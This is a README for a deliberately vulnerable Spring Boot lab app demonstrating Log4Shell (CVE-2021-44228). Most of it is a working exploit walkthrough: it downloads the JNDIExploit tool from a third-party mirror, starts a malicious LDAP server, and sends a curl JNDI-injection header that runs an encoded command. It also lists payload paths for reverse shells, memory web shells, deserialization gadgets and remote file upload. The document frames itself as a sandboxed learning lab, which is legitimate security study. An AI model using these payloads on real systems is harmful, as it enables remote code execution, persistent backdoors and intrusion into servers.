# Log4Shell sample vulnerable application (CVE-2021-44228)

This repository contains a Spring Boot web application vulnerable to CVE-2021-44228, nicknamed [Log4Shell](https://www.lunasec.io/docs/blog/log4j-zero-day/).

It uses Log4j 2.14.1 (through `spring-boot-starter-log4j2` 2.6.1) and the JDK 1.8.0_181.



## Running the application

Run it:

```bash
docker run --name vulnerable-app --rm -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app@sha256:6f88430688108e512f7405ac3c73d47f5c370780b94182854ea2cddc6bd59929
```

## Exploitation steps

*Note: This is highly inspired by the original [LunaSec advisory](https://www.lunasec.io/docs/blog/log4j-zero-day/). **Run at your own risk, preferably in a VM in a sandbox environment**.*

**Update (Dec 13th)**: *The JNDIExploit repository has been removed from GitHub (presumably, [not by GitHub](https://twitter.com/_mph4/status/1470343429599211528))...*

[Click here](https://gitea.avc.cx/borekon/log4shell-vulnerable-app/raw/branch/main/JNDIExploit.v1.2.zip) to download it.

* Use [JNDIExploit](https://github.com/zzwlpx/JNDIExploit) to spin up a malicious LDAP server

```bash
wget https://gitea.avc.cx/borekon/log4shell-vulnerable-app/raw/branch/main/JNDIExploit.v1.2.zip
unzip JNDIExploit.v1.2.zip
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i your-private-ip -p 8888
```

* Then, trigger the exploit using:

```bash
# will execute 'touch /tmp/pwned'
curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://your-private-ip:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'
```

* Notice the output of JNDIExploit, showing it has sent a malicious LDAP response and served the second-stage payload:

```
[+] LDAP Server Start Listening on 1389...
[+] HTTP Server Start Listening on 8888...
[+] Received LDAP Query: Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo
[+] Paylaod: command
[+] Command: touch /tmp/pwned

[+] Sending LDAP ResourceRef result for Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo with basic remote reference payload
[+] Send LDAP reference result for Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo redirecting to http://192.168.1.143:8888/Exploitjkk87OnvOH.class
[+] New HTTP Request From /192.168.1.143:50119 /Exploitjkk87OnvOH.class
[+] Receive ClassRequest: Exploitjkk87OnvOH.class
[+] Response Code: 200
```

* To confirm that the code execution was successful, notice that the file `/tmp/pwned` was created in the container running the vulnerable application:

```
$ docker exec vulnerable-app ls /tmp
...
pwned
...
```

## Supported LDAP queries

All words are **case INSENSITIVE** when sent to the LDAP server.

```
[+] Basic Queries: ldap://127.0.0.1:1389/Basic/[PayloadType]/[Params], e.g.
ldap://127.0.0.1:1389/Basic/Dnslog/[domain]
ldap://127.0.0.1:1389/Basic/Command/[cmd]
ldap://127.0.0.1:1389/Basic/Command/Base64/[base64_encoded_cmd]
ldap://127.0.0.1:1389/Basic/ReverseShell/[ip]/[port] ---windows NOT supported
ldap://127.0.0.1:1389/Basic/TomcatMemshell
ldap://127.0.0.1:1389/Basic/JettyMemshell
ldap://127.0.0.1:1389/Basic/WeblogicMemshell
ldap://127.0.0.1:1389/Basic/JBossMemshell
ldap://127.0.0.1:1389/Basic/WebsphereMemshell
ldap://127.0.0.1:1389/Basic/SpringMemshell

[+] Deserialize Queries: ldap://127.0.0.1:1389/Deserialize/[GadgetType]/[PayloadType]/[Params], e.g.
ldap://127.0.0.1:1389/Deserialize/URLDNS/[domain]
ldap://127.0.0.1:1389/Deserialize/CommonsCollections1/Dnslog/[domain]
ldap://127.0.0.1:1389/Deserialize/CommonsCollections2/Command/[cmd]
ldap://127.0.0.1:1389/Deserialize/CommonsBeanutils1/Command/Base64/[base64_encoded_cmd]
ldap://127.0.0.1:1389/Deserialize/C3P0/ReverseShell/[ip]/[port] ---windows NOT supported
ldap://127.0.0.1:1389/Deserialize/Jre8u20/TomcatMemshell ---ALSO support other memshells

[+] TomcatBypass Queries
ldap://127.0.0.1:1389/TomcatBypass/Dnslog/[domain]
ldap://127.0.0.1:1389/TomcatBypass/Command/[cmd]
ldap://127.0.0.1:1389/TomcatBypass/Command/Base64/[base64_encoded_cmd]
ldap://127.0.0.1:1389/TomcatBypass/ReverseShell/[ip]/[port] ---windows NOT supported
ldap://127.0.0.1:1389/TomcatBypass/TomcatMemshell
ldap://127.0.0.1:1389/TomcatBypass/SpringMemshell

[+] GroovyBypass Queries
ldap://127.0.0.1:1389/GroovyBypass/Command/[cmd]
ldap://127.0.0.1:1389/GroovyBypass/Command/Base64/[base64_encoded_cmd]

[+] WebsphereBypass Queries
ldap://127.0.0.1:1389/WebsphereBypass/List/file=[file or directory]
ldap://127.0.0.1:1389/WebsphereBypass/Upload/Dnslog/[domain]
ldap://127.0.0.1:1389/WebsphereBypass/Upload/Command/[cmd]
ldap://127.0.0.1:1389/WebsphereBypass/Upload/Command/Base64/[base64_encoded_cmd]
ldap://127.0.0.1:1389/WebsphereBypass/Upload/ReverseShell/[ip]/[port] ---windows NOT supported
ldap://127.0.0.1:1389/WebsphereBypass/Upload/WebsphereMemshell
ldap://127.0.0.1:1389/WebsphereBypass/RCE/path=[uploaded_jar_path] ----e.g: ../../../../../tmp/jar_cache7808167489549525095.tmp
```

### base64 trick

You can convert a command to base64 with this [online encoder](https://www.base64encode.org/).

**Note** that the `+` sign must be encoded as %2B. The following chart shows more possibilities:



## Reference

https://www.lunasec.io/docs/blog/log4j-zero-day/

https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/

## Contributors

[@christophetd](https://twitter.com/christophetd)

[@rayhan0x01](https://twitter.com/rayhan0x01)